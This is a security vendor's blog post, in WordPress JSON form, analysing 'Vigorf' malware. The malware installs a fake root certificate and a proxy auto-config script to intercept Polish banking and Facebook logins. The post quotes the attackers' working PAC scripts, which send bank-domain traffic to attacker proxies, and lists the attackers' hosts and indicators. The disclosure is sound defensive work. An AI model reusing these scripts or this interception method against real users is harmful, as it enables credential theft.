{"id":2667,"date":"2024-09-25T19:22:09","date_gmt":"2024-09-25T19:22:09","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2667"},"modified":"2025-07-29T06:03:45","modified_gmt":"2025-07-29T06:03:45","slug":"vigorf-malware-intercepting-facebook-and-banking-traffic","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/vigorf-malware-intercepting-facebook-and-banking-traffic\/","title":{"rendered":"Vigorf Malware Intercepting Facebook and Banking Traffic"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"265\" height=\"318\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/peeking-owl.webp\" alt=\"\" class=\"wp-image-2686\" style=\"aspect-ratio:1;width:782px;height:auto\"\/><\/figure>\n<\/div>\n\n\n<p><strong>Vigorf Malware Intercepting Facebook and Banking Traffic&nbsp;<\/strong><\/p>\n\n\n\n<p>LMNTRIX analysts have detected a malware sample targeting users in Poland which ultimately commandeers their traffic when they visit Facebook or a number of Polish banking sites.&nbsp;<\/p>\n\n\n\n<p>Dubbed \u2018Vigorf\u2019, it uses advanced evasion techniques to bypass the security controls of the target network. A particularly advanced feature of Vigorf is that it uses a fake Comodo SSL certificate as part of the malware payload installer, as well as a proxy server to bypass network security. &nbsp;<\/p>\n\n\n\n<p>At a high level, the attack chain is as follows:&nbsp;<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;The victim receives a spam mail containing an embedded OLE object in a Word document that executes the PowerShell script \u201cinstaller.ps1\u201d&nbsp;<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;The malicious file \u201cpl.exe\u201d is downloaded and executed&nbsp;<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;The malware \u201cpl.exe\u201d adds a fake Comodo SSL certificate, saved in the Temp folder, to Root Trust<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;A Proxy Auto Configuration (PAC) script is added to System Proxy settings<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;When a victim visits any of the sites mentioned in the PAC script, the proxy is enabled, and attackers can snoop the victim\u2019s communications<\/p>\n\n\n\n<p>The sites currently listed in the PAC script are largely banking sites including the Polish banks MBank, GetIn Bank, Alior Bank, and iPKO, as well as the Polish presence of ING.<\/p>\n\n\n\n<p>Beyond banking sites, Facebook\u2019s Polish site is also included in the PAC script.&nbsp;<\/p>\n\n\n\n<p>Whenever a user infected by Vigorf visits any of the above sites, the attackers are able to see all the user\u2019s previously encrypted communications, including log in credentials. &nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>Installer Details \u2013 \u201cinstaller.ps1\u201d<\/strong><\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;MD5: 43da184a59baa821ea7c4e25e6fde4d5<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;Filename: installer.ps1<\/p>\n\n\n\n<p>The PowerShell-based installer uses a fake Comodo Root Certificate for SSL based connections. This allows the attacker to have \u2018man-in-the-middle\u2019 functionality, intercepting traffic without triggering security warnings. This particular trade craft has not been seen in the wild since <a href=\"https:\/\/www.trendmicro.de\/cloud-content\/us\/pdfs\/security-intelligence\/white-papers\/wp-finding-holes-operation-emmental.pdf\" target=\"_blank\" rel=\"noopener\">Operation Emmental<\/a> in 2014.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"516\" height=\"716\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/1-48.webp\" alt=\"\" class=\"wp-image-2676\"\/><\/figure>\n\n\n\n<p><em>Image 1: Fake Comdo SSL Certificate<\/em><\/p>\n\n\n\n<p>The PowerShell script contains the certificate in encoded form. It is written to file \u201c_w41415_log.log\u201d inside the user\u2019s Temp folder. It is also added to the Root Trust Store of the infected system using the Windows utility \u201ccertutil.exe\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"775\" height=\"602\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/2-46.webp\" alt=\"\" class=\"wp-image-2677\"\/><\/figure>\n\n\n\n<p><em>Image 2: Fake Root Cert used by Vigorf&nbsp;<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"881\" height=\"122\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3-45.webp\" alt=\"\" class=\"wp-image-2678\"\/><\/figure>\n\n\n\n<p><em>Image 3: Windows utility \u201ccertutil.exe\u201d is used to add store Root<\/em><\/p>\n\n\n\n<p>Once the certificate has been added, the installer then connects to an IP to download the malware and save it in the user\u2019s local AppData folder (\u201cC:\\Users\\&lt;username&gt;\\AppData\\Local\u201d) with a random file name.&nbsp;<\/p>\n\n\n\n<p>The downloaded malware is then executed as a different process. Initially, the IP address hosting the malware belonged to VULTR, a cloud provider, but at the time of writing this IP was taken offline. As we have seen the attackers recently update their proxy scripts (further below) we believe the malware is being hosted on a new site and the campaign is still active.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"881\" height=\"264\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/4-46.webp\" alt=\"\" class=\"wp-image-2679\"\/><\/figure>\n\n\n\n<p><em>Image 4: Malware Payload download URL used in the script&nbsp;<\/em><\/p>\n\n\n\n<p>The PowerShell script also references another IP (45[.]55[.]107[.]240), which we have identified as the Command and Control server.<\/p>\n\n\n\n<p><strong>Malware Details \u2013 \u201cpl.exe\u201d<\/strong><\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;MD5: 4535642aada6b2e12cf9f620113fc377<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;Filename: pl.exe<\/p>\n\n\n\n<p>After being downloaded, \u201cpl.exe\u201d again executes \u201ccertutil.exe\u201d in order to add the certificate from the file \u201c_w41415_log.log\u201d to the system Root Trust Store \u2013 as seen below:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"416\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/5-43.webp\" alt=\"\" class=\"wp-image-2680\"\/><\/figure>\n\n\n\n<p><em>Image 5: Execution of Process \u201cCertutil.exe\u201d to add certificate from \u201c_w41415_log.log\u201d<\/em><\/p>\n\n\n\n<p>Vigorf then executes a PAC file which contains a set of rules coded in JavaScript. This allows a web browser to determine whether to send web traffic direct to the Internet or if it should be sent via a proxy server.<\/p>\n\n\n\n<p>PAC files control how a web browser handles HTTP, HTTPS, and FTP traffic. We observed the malware calling out to [http]:\/\/spiderbat[.]top\/corporate2\/index.js=14854f&#8230; (below). This is the URL which contains the PAC scripts. During intelligence gathering, we noticed the attackers updating the scripts.&nbsp;<\/p>\n\n\n\n<p>In simple terms, the PAC script contains the list of sites that the attackers can intercept traffic from when an infected user visits them.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"375\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/6-41.webp\" alt=\"\" class=\"wp-image-2681\"\/><\/figure>\n\n\n\n<p><em>Image 6: Malware download \u201cJavaScript\u201d File<\/em><\/p>\n\n\n\n<p>While writing this article, we observed that the attackers changed their proxy server, as the previous IP was marked as malicious by OSINT services. This suggests the campaign ongoing. The AutoConfigURL setting points to a web address that contains the below proxy settings \u2013 once Vigorf is successfully executed, these settings are enforced for the infected system.&nbsp;<\/p>\n\n\n\n<p><strong>Old PAC script:<\/strong><\/p>\n\n\n\n<p>1.&nbsp;&nbsp; &nbsp;function FindProxyForURL(url, host) { var proxy = &#8220;PROXY coughsmoggyspark.co:8001;&#8221;; var hosts = new Array(&#8216;*whoer.net&#8217;,&#8217;*.ipko.pl*&#8217;,&#8217;*mbank.pl*&#8217;,&#8217;login.ingbank.pl*&#8217;,&#8217;*centrum24.pl*&#8217;); for (var i = 0; i &lt; hosts.length; i++) { if (shExpMatch(host, hosts[i])) { return proxy } } return &#8220;DIRECT&#8221;<\/p>\n\n\n\n<p>2.&nbsp;&nbsp; &nbsp;function FindProxyForURL(url, host) { var proxy = &#8220;PROXY 209.250.247.168:8001;&#8221;; var hosts = new Array(&#8216;*whoer.net&#8217;,&#8217;*.ipko.pl*&#8217;,&#8217;*mbank.pl*&#8217;,&#8217;login.ingbank.pl*&#8217;,&#8217;*centrum24.pl*&#8217;); for (var i = 0; i &lt; hosts.length; i++) { if (shExpMatch(host, hosts[i])) { return proxy } } return &#8220;DIRECT&#8221;<\/p>\n\n\n\n<p><strong>New PAC script:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"210\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/7-39.webp\" alt=\"\" class=\"wp-image-2682\"\/><\/figure>\n\n\n\n<p><em>Image 7: New PAC script of the campaign<\/em><\/p>\n\n\n\n<p>The above captured code snippet shows the attackers are continuously changing the proxy server but using the same port (8001). Additionally, they\u2019re only enabling this proxy for specific .pl (Poland) top-level domain sites. Also, attackers are continuously adding new domains to apply proxy settings.<\/p>\n\n\n\n<p>Proxy Server:<\/p>\n\n\n\n<p>1.&nbsp;&nbsp; &nbsp;coughsmoggyspark.co<\/p>\n\n\n\n<p>2.&nbsp;&nbsp; &nbsp;209.250247.168<\/p>\n\n\n\n<p>3.&nbsp;&nbsp; &nbsp;209.250.251.127<\/p>\n\n\n\n<p>Proxy enabled sites:<\/p>\n\n\n\n<p>1.&nbsp;&nbsp; &nbsp;*.whoer.net<\/p>\n\n\n\n<p>2.&nbsp;&nbsp; &nbsp;*wp.pl<\/p>\n\n\n\n<p>3.&nbsp;&nbsp; &nbsp;*.o2.pl<\/p>\n\n\n\n<p>4.&nbsp;&nbsp; &nbsp;*facebook.pl<\/p>\n\n\n\n<p>5.&nbsp;&nbsp; &nbsp;*ipko.pl*<\/p>\n\n\n\n<p>6.&nbsp;&nbsp; &nbsp;*mbank.pl*<\/p>\n\n\n\n<p>7.&nbsp;&nbsp; &nbsp;*login.ingbank.pl*<\/p>\n\n\n\n<p>8.&nbsp;&nbsp; &nbsp;*centrum24.pl*<\/p>\n\n\n\n<p>9.&nbsp;&nbsp; &nbsp;*secure.getinbank.pl*<\/p>\n\n\n\n<p>10.&nbsp;&nbsp; &nbsp;*aliorbank.pl*<\/p>\n\n\n\n<p>The three proxy servers above are attacker controlled, and represent the infrastructure used to intercept traffic and steal credentials. The 10 proxy-enabled sites are the sites being targeted by the attacker with their PAC script. This means that when a user infected by Vigorf visits any of these sites, the user\u2019s traffic will not communicate directly with those sites but will do so via an attacker-controlled proxy server \u2013 which is capable of SSL interception thanks to the attacker having already installed their fake SSL certificate in the Root trust.&nbsp;<\/p>\n\n\n\n<p>Thus, the infected system completely trusts the proxy server and the proxy server is able to decrypt and re-encrypt the packets, giving the attacker man-in-the-middle abilities without raising any browser security alerts.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"368\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/8-34.webp\" alt=\"\" class=\"wp-image-2683\"\/><\/figure>\n\n\n\n<p><em>Figure 8: Attackers are able to intercept traffic between victims and Polish bank mBank<\/em>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"550\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/9-30.webp\" alt=\"\" class=\"wp-image-2684\"\/><\/figure>\n\n\n\n<p><em>Figure 9: Attackers are able to intercept traffic between victims and Polish ING customers&nbsp;<\/em><\/p>\n\n\n\n<p>Below is an illustration to help visualise how the traffic is intercepted. Once a victim visits one of the 10 proxy-enable sites, when they enter their log in details, the traffic is sent to the proxy server, decrypted and collected by the attacker, before being re-encrypted and sent to site. The attacker now has the victim\u2019s log in details and can use them at will.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"860\" height=\"502\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/10-29.webp\" alt=\"\" class=\"wp-image-2685\"\/><\/figure>\n\n\n\n<p><em>Image 10: Packet Flow illustration of traffic interception used by threat actors.<\/em><\/p>\n\n\n\n<p><strong>Indicators of Compromise<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>MD5<\/td><td>43da184a59baa821ea7c4e25e6fde4d5<\/td><td>installer.ps1<\/td><\/tr><tr><td>SHA1<\/td><td>763150139510937b182e51f72ccbe28a1934c4cc<\/td><td>installer.ps1<\/td><\/tr><tr><td>SHA256<\/td><td>f91927897b5aed4c3454eca429bd2cb416bdd6deb4f80c68b420c8699b6c63fa<\/td><td>installer.ps1<\/td><\/tr><tr><td>IPV4<\/td><td>140[.]82[.]33[.]56<\/td><td>Malware host<\/td><\/tr><tr><td>IPV4<\/td><td>45[.]55[.]107[.]240<\/td><td>CNC<\/td><\/tr><tr><td>MD5<\/td><td>80A3A7F3DA32CBF6E324B26AF7D2EEFF<\/td><td>_w41415_log.log<\/td><\/tr><tr><td>DOMAIN<\/td><td>hxxp:\/\/spiderbat[.]top\/corporate2\/index.js<\/td><td>PAC URL<\/td><\/tr><tr><td>DOMAIN<\/td><td>hxxp:\/\/glibitchyard[.]co\/corporate2\/index.js<\/td><td>PAC URL<\/td><\/tr><tr><td>DOMAIN<\/td><td>hxxp:\/\/spiderbat[.]top\/corporate2\/<\/td><td>PAC URL<\/td><\/tr><tr><td>DOMAIN<\/td><td>coughsmoggyspark[.]co<\/td><td>Proxy Server<\/td><\/tr><tr><td>IPV4<\/td><td>209[.]250[.]247[.]168<\/td><td>Proxy Server<\/td><\/tr><tr><td>IPV4<\/td><td>209[.]250[.]251[.]127<\/td><td>Proxy Server<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>Mitigation&nbsp;<\/strong><br><br>Users are encouraged to update existing security solutions with the IOCs listed above. As always, exercise caution when dealing with emails from unknown sources and do not click on any links or open attachment from emails that are untrusted.&nbsp;<\/p>\n\n\n\n<p>On 2019-03-04<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vigorf Malware Intercepting Facebook and Banking Traffic&nbsp; LMNTRIX analysts have detected a malware sample targeting users in Poland which ultimately commandeers their traffic when they visit Facebook or a number of Polish banking sites.&nbsp; Dubbed &lsquo;Vigorf&rsquo;, it uses advanced evasion techniques to bypass the security controls of the target network. A particularly advanced feature of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2686,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2667"}],"version-history":[{"count":4,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667\/revisions"}],"predecessor-version":[{"id":4303,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667\/revisions\/4303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2686"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}